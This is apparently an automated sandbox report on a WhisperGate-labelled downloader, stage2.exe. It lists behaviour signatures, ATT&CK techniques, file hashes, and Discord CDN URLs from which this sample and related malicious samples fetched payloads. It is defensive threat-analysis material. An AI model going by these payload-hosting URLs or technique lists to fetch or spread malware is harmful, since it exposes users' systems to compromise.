    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\stage2.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_080D5860 CreateNamedPipeW,13_2_080D5860
    Source: Amcache.hve.26.dr, Amcache.hve.LOG1.26.drBinary or memory string: c:\users\user\desktop\procexp.exe
    Source: Amcache.hve.26.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
    Source: Amcache.hve.26.dr, Amcache.hve.LOG1.26.drBinary or memory string: procexp.exe

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsPowerShell1Path InterceptionProcess Injection13Masquerading1OS Credential DumpingSecurity Software Discovery21Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel21Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection13NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol4SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information1Cached Domain CredentialsFile and Directory Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing1DCSyncSystem Information Discovery12Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 signatures2 2 Behavior Graph ID: 553986 Sample: stage2.exe Startdate: 17/01/2022 Architecture: WINDOWS Score: 72 29 Multi AV Scanner detection for submitted file 2->29 31 Yara detected MSILDownloaderGeneric 2->31 33 .NET source code contains potential unpacker 2->33 35 2 other signatures 2->35 7 stage2.exe 15 3 2->7         started        process3 dnsIp4 25 cdn.discordapp.com 162.159.130.233, 443, 49752 CLOUDFLARENETUS United States 7->25 37 Encrypted powershell cmdline option found 7->37 11 WerFault.exe 23 9 7->11         started        15 powershell.exe 18 7->15         started        17 powershell.exe 14 7->17         started        signatures5 process6 dnsIp7 27 192.168.2.1 unknown unknown 11->27 23 C:\ProgramData\Microsoft\...\Report.wer, Little-endian 11->23 dropped 19 conhost.exe 15->19         started        21 conhost.exe 17->21         started        file8 process9

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    stage2.exe45%VirustotalBrowse
    stage2.exe49%ReversingLabsByteCode-MSIL.Network.WhisperGate
    stage2.exe100%Joe Sandbox ML

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    https://watson.telemetry)0%Avira URL Cloudsafe
    http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
    http://crl.microsoft0%URL Reputationsafe
    https://go.micro0%URL Reputationsafe
    https://contoso.com/License0%URL Reputationsafe
    https://contoso.com/Icon0%URL Reputationsafe
    https://cdn.discordapp.com40%URL Reputationsafe
    https://contoso.com/0%URL Reputationsafe
    http://pesterbdd.com/images/Pester.png$0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    cdn.discordapp.com
    		162.159.130.233
    		truefalse
      		high

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      https://cdn.discordapp.com/attachments/928503440139771947/930108637681184768/Tbopbh.jpgfalse
        		high

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        https://watson.telemetry)WerFault.exe, 0000001A.00000002.478119853.0000000000DAA000.00000004.00000001.sdmpfalse
        • Avira URL Cloud: safe
        		low
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmpfalse
          		high
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifierWerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmpfalse
            		high
            http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.343214825.0000000005E24000.00000004.00000001.sdmpfalse
              		high
              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000003.310415141.0000000007CBA000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.341127908.0000000004F02000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmpfalse
                		high
                http://crl.microsoftpowershell.exe, 0000000D.00000002.432860821.0000000009220000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000003.310415141.0000000007CBA000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.341127908.0000000004F02000.00000004.00000001.sdmpfalse
                  		high
                  https://go.micropowershell.exe, 00000002.00000002.341684839.0000000005150000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.429277847.0000000004FA7000.00000004.00000001.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://contoso.com/Licensepowershell.exe, 00000002.00000002.343214825.0000000005E24000.00000004.00000001.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://contoso.com/Iconpowershell.exe, 00000002.00000002.343214825.0000000005E24000.00000004.00000001.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphoneWerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmpfalse
                    		high
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephoneWerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmpfalse
                      		high
                      https://github.com/Pester/Pester$powershell.exe, 00000002.00000002.341127908.0000000004F02000.00000004.00000001.sdmpfalse
                        		high
                        http://upx.sf.netAmcache.hve.26.drfalse
                          		high
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovinceWerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmpfalse
                            		high
                            https://cdn.discordapp.comstage2.exe, 00000001.00000000.441216587.0000000003363000.00000004.00000001.sdmpfalse
                              		high
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmpfalse
                                		high
                                https://github.com/Pester/Pesterpowershell.exe, 00000002.00000003.310415141.0000000007CBA000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.341127908.0000000004F02000.00000004.00000001.sdmpfalse
                                  		high
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmpfalse
                                    		high
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authenticationWerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmpfalse
                                      		high
                                      https://cdn.discordapp.com4stage2.exe, 00000001.00000000.441216587.0000000003363000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.oWerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmpfalse
                                        		high
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidWerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmpfalse
                                          		high
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.oWerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmpfalse
                                            		high
                                            http://www.apache.org/licenses/LICENSE-2.0.html$powershell.exe, 00000002.00000002.341127908.0000000004F02000.00000004.00000001.sdmpfalse
                                              		high
                                              http://cdn.discordapp.comstage2.exe, 00000001.00000000.438989759.000000000337A000.00000004.00000001.sdmpfalse
                                                		high
                                                https://contoso.com/powershell.exe, 00000002.00000002.343214825.0000000005E24000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.343214825.0000000005E24000.00000004.00000001.sdmpfalse
                                                  		high
                                                  http://pesterbdd.com/images/Pester.png$powershell.exe, 00000002.00000002.341127908.0000000004F02000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmpfalse
                                                    		high
                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namestage2.exe, 00000001.00000000.441216587.0000000003363000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.340839036.0000000004DC1000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.427485435.0000000004B61000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.461645704.0000000005380000.00000004.00000001.sdmpfalse
                                                      		high

                                                      Contacted IPs

                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs

                                                      Public

                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      162.159.130.233
                                                      		cdn.discordapp.comUnited States
                                                      		13335CLOUDFLARENETUSfalse

                                                      Private

                                                      IP
                                                      192.168.2.1

                                                      General Information

                                                      Joe Sandbox Version:34.0.0 Boulder Opal
                                                      Analysis ID:553986
                                                      Start date:17.01.2022
                                                      Start time:02:23:19
                                                      Joe Sandbox Product:CloudBasic
                                                      Overall analysis duration:0h 8m 44s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Sample file name:stage2.exe
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                      Number of analysed new started processes analysed:28
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • HDC enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Detection:MAL
                                                      Classification:mal72.troj.evad.winEXE@8/14@1/2
                                                      EGA Information:
                                                      • Successful, ratio: 66.7%
                                                      HDC Information:
                                                      • Successful, ratio: 96.4% (good quality ratio 85.7%)
                                                      • Quality average: 71.6%
                                                      • Quality standard deviation: 34.7%
                                                      HCA Information:
                                                      • Successful, ratio: 100%
                                                      • Number of executed functions: 72
                                                      • Number of non-executed functions: 8
                                                      Cookbook Comments:
                                                      • Adjust boot time
                                                      • Enable AMSI
                                                      • Found application associated with file extension: .exe
                                                      Warnings:
                                                      Show All
                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                      • Excluded IPs from analysis (whitelisted): 23.211.4.86, 13.89.179.12
                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, onedsblobprdcus17.centralus.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, ris.api.iris.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, prod.fs.microsoft.com.akadns.net
                                                      • Execution Graph export aborted for target stage2.exe, PID 7084 because there are no executed function
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      • Report size getting too big, too many NtSetInformationFile calls found.

                                                      Simulations

                                                      Behavior and APIs

                                                      TimeTypeDescription
                                                      02:24:21API Interceptor67x Sleep call for process: powershell.exe modified
                                                      02:25:42API Interceptor1x Sleep call for process: WerFault.exe modified

                                                      Joe Sandbox View / Context

                                                      IPs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                      162.159.130.233MSQNZmmg2F.exeGet hashmaliciousBrowse
                                                      • cdn.discordapp.com/attachments/898638713985302540/898905970657345626/al.exe
                                                      b7cwlpwH6S.exeGet hashmaliciousBrowse
                                                      • cdn.discordapp.com/attachments/878382243242983437/878684457245220884/mrmoms.exe
                                                      order-confirmation.doc__.rtfGet hashmaliciousBrowse
                                                      • cdn.discordapp.com/attachments/843685789120331799/847476783744811018/OtI.exe
                                                      Order Confirmation.docGet hashmaliciousBrowse
                                                      • cdn.discordapp.com/attachments/843685789120331799/847476783744811018/OtI.exe
                                                      cfe14e87_by_Libranalysis.rtfGet hashmaliciousBrowse
                                                      • cdn.discordapp.com/attachments/520353354304585730/839557970173100102/ew.exe
                                                      SkKcQaHEB8.exeGet hashmaliciousBrowse
                                                      • cdn.discordapp.com/attachments/808882061918076978/836771636082376724/VMtEguRH.exe
                                                      P20200107.DOCGet hashmaliciousBrowse
                                                      • cdn.discordapp.com/attachments/808882061918076978/836771636082376724/VMtEguRH.exe
                                                      FBRO ORDER SHEET - YATSAL SUMMER 2021.exeGet hashmaliciousBrowse
                                                      • cdn.discordapp.com/attachments/832005460982235229/836405556838924308/usd.exe
                                                      SKM_C258 Up21042213080.exeGet hashmaliciousBrowse
                                                      • cdn.discordapp.com/attachments/832005460982235229/834717762281930792/12345.exe
                                                      SKM_C258 Up21042213080.exeGet hashmaliciousBrowse
                                                      • cdn.discordapp.com/attachments/832005460982235229/834717762281930792/12345.exe
                                                      G019 & G022 SPEC SHEET.exeGet hashmaliciousBrowse
                                                      • cdn.discordapp.com/attachments/832005460982235229/834598381472448573/23456.exe
                                                      Marking Machine 30W Specification.exeGet hashmaliciousBrowse
                                                      • cdn.discordapp.com/attachments/832005460982235229/834598381472448573/23456.exe
                                                      2021 RFQ Products Required.docGet hashmaliciousBrowse
                                                      • cdn.discordapp.com/attachments/821511904769998921/821511945881911306/panam.exe
                                                      Company Reference1.docGet hashmaliciousBrowse
                                                      • cdn.discordapp.com/attachments/819949436054536222/820935251337281546/nbalax.exe
                                                      PAY SLIP.docGet hashmaliciousBrowse
                                                      • cdn.discordapp.com/attachments/788946375533789214/788947376849027092/atlasx.scr
                                                      SecuriteInfo.com.Exploit.Rtf.Obfuscated.16.25071.rtfGet hashmaliciousBrowse
                                                      • cdn.discordapp.com/attachments/785423761461477416/785424240047947786/angelrawfile.exe
                                                      part1.rtfGet hashmaliciousBrowse
                                                      • cdn.discordapp.com/attachments/783666652440428545/783667553490698250/kdot.exe

                                                      Domains

                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                      cdn.discordapp.com8v2BxI8QH3.exeGet hashmaliciousBrowse
                                                      • 162.159.135.233
                                                      98I23PNG1A.exeGet hashmaliciousBrowse
                                                      • 162.159.134.233
                                                      wkLwbDqVFQ.exeGet hashmaliciousBrowse
                                                      • 162.159.129.233
                                                      fWIjsmvPzi.exeGet hashmaliciousBrowse
                                                      • 162.159.135.233
                                                      MiA2FZAEJt.exeGet hashmaliciousBrowse
                                                      • 162.159.134.233
                                                      VvPRlqqUxb.exeGet hashmaliciousBrowse
                                                      • 162.159.135.233
                                                      QHU13Mk6Ad.exeGet hashmaliciousBrowse
                                                      • 162.159.135.233
                                                      Q8JyOEenDZ.exeGet hashmaliciousBrowse
                                                      • 162.159.134.233
                                                      6cxhzTgoTg.exeGet hashmaliciousBrowse
                                                      • 162.159.135.233
                                                      jVLNrAAvok.exeGet hashmaliciousBrowse
                                                      • 162.159.133.233
                                                      2W7cYstSE2.exeGet hashmaliciousBrowse
                                                      • 162.159.130.233
                                                      NnfEUSGJ3E.exeGet hashmaliciousBrowse
                                                      • 162.159.130.233
                                                      Bn3pZ7FTQw.msiGet hashmaliciousBrowse
                                                      • 162.159.135.233
                                                      1vSqxVQ2i8.exeGet hashmaliciousBrowse
                                                      • 162.159.129.233
                                                      NViBzL7J3T.exeGet hashmaliciousBrowse
                                                      • 162.159.135.233
                                                      mLkXuLOqjo.exeGet hashmaliciousBrowse
                                                      • 162.159.133.233
                                                      POOA3yOX9U.exeGet hashmaliciousBrowse
                                                      • 162.159.135.233
                                                      fIoq2bMplA.exeGet hashmaliciousBrowse
                                                      • 162.159.135.233
                                                      pSyxjWZ8Ym.exeGet hashmaliciousBrowse
                                                      • 162.159.129.233
                                                      dzOULChIgx.exeGet hashmaliciousBrowse
                                                      • 162.159.133.233

                                                      ASN

                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                      CLOUDFLARENETUSNewOrder.docGet hashmaliciousBrowse
                                                      • 104.21.62.142
                                                      8v2BxI8QH3.exeGet hashmaliciousBrowse
                                                      • 162.159.135.233
                                                      RFQ 4027200 #21-11462-YJLINK.exeGet hashmaliciousBrowse
                                                      • 172.67.141.183
                                                      3aJqOjkYXO.exeGet hashmaliciousBrowse
                                                      • 172.67.201.71
                                                      98I23PNG1A.exeGet hashmaliciousBrowse
                                                      • 162.159.134.233
                                                      wkLwbDqVFQ.exeGet hashmaliciousBrowse
                                                      • 162.159.129.233
                                                      fWIjsmvPzi.exeGet hashmaliciousBrowse
                                                      • 162.159.135.233
                                                      MiA2FZAEJt.exeGet hashmaliciousBrowse
                                                      • 162.159.134.233
                                                      VvPRlqqUxb.exeGet hashmaliciousBrowse
                                                      • 162.159.135.233
                                                      QHU13Mk6Ad.exeGet hashmaliciousBrowse
                                                      • 172.65.251.78
                                                      Q8JyOEenDZ.exeGet hashmaliciousBrowse
                                                      • 162.159.134.233
                                                      6cxhzTgoTg.exeGet hashmaliciousBrowse
                                                      • 172.65.251.78
                                                      Atkt3Re71nGet hashmaliciousBrowse
                                                      • 8.47.33.134
                                                      jVLNrAAvok.exeGet hashmaliciousBrowse
                                                      • 162.159.133.233
                                                      arm7Get hashmaliciousBrowse
                                                      • 1.12.2.190
                                                      2W7cYstSE2.exeGet hashmaliciousBrowse
                                                      • 162.159.130.233
                                                      NnfEUSGJ3E.exeGet hashmaliciousBrowse
                                                      • 104.21.38.221
                                                      Bn3pZ7FTQw.msiGet hashmaliciousBrowse
                                                      • 162.159.135.233
                                                      triage_dropped_file.exeGet hashmaliciousBrowse
                                                      • 104.21.37.76
                                                      1vSqxVQ2i8.exeGet hashmaliciousBrowse
                                                      • 162.159.129.233

                                                      JA3 Fingerprints

                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                      3b5074b1b5d032e5620f69f9f700ff0e98I23PNG1A.exeGet hashmaliciousBrowse
                                                      • 162.159.130.233
                                                      jVLNrAAvok.exeGet hashmaliciousBrowse
                                                      • 162.159.130.233
                                                      Payment Invoice.exeGet hashmaliciousBrowse
                                                      • 162.159.130.233
                                                      iVIjd6oGHk.exeGet hashmaliciousBrowse
                                                      • 162.159.130.233
                                                      GkbqpbDdJO.exeGet hashmaliciousBrowse
                                                      • 162.159.130.233
                                                      dzOULChIgx.exeGet hashmaliciousBrowse
                                                      • 162.159.130.233
                                                      XyA90PdQVL.exeGet hashmaliciousBrowse
                                                      • 162.159.130.233
                                                      R5NBhKWQbq.exeGet hashmaliciousBrowse
                                                      • 162.159.130.233
                                                      Phu5fvVGxb.exeGet hashmaliciousBrowse
                                                      • 162.159.130.233
                                                      tjKpDbprbC.exeGet hashmaliciousBrowse
                                                      • 162.159.130.233
                                                      4y430rv4An.exeGet hashmaliciousBrowse
                                                      • 162.159.130.233
                                                      6DNTEUx66h.exeGet hashmaliciousBrowse
                                                      • 162.159.130.233
                                                      lxLsGA9J7t.exeGet hashmaliciousBrowse
                                                      • 162.159.130.233
                                                      E59vITlQv2.exeGet hashmaliciousBrowse
                                                      • 162.159.130.233
                                                      jTeJ1Gd8A7.exeGet hashmaliciousBrowse
                                                      • 162.159.130.233
                                                      sUAuS8peHn.exeGet hashmaliciousBrowse
                                                      • 162.159.130.233
                                                      Emailming bank paper payment .exeGet hashmaliciousBrowse
                                                      • 162.159.130.233
                                                      7YpsSHnnWF.exeGet hashmaliciousBrowse
                                                      • 162.159.130.233
                                                      Oujf658xWy.exeGet hashmaliciousBrowse
                                                      • 162.159.130.233
                                                      RxUa3OoT3f.exeGet hashmaliciousBrowse
                                                      • 162.159.130.233

                                                      Dropped Files

                                                      No context

                                                      Created / dropped Files

                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_stage2.exe_71132b2d46f2be7ca5f7ca27edcda1a773a522_f347d55b_0069b9d6\Report.wer
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):1.213468288928447
                                                      Encrypted:false
                                                      SSDEEP:192:OOGYNnugoHBUZMXmAMaPbFx3iIQ/u7sdS274ItrW:mYNnOBUZMXmAMayIQ/u7sdX4ItrW
                                                      MD5:001C5A8A35F2A1BC8E8B554AAD9D99FB
                                                      SHA1:14FB74DBD5C503FD7CAEE5454006BBC8F5D38A9F
                                                      SHA-256:5B31C7776A10B1EF5250A21468601C317530F710D1825100DFA2344B5397D5AD
                                                      SHA-512:0DA7DC6F44012F114B3A905DA3E7E4DA70BCCF075F4830F10EFA1BB49EDB41445D7E684011569D31EC651BE13414C0558D003C1931A78C930CD51583CB8EBAEF
                                                      Malicious:true
                                                      Reputation:low
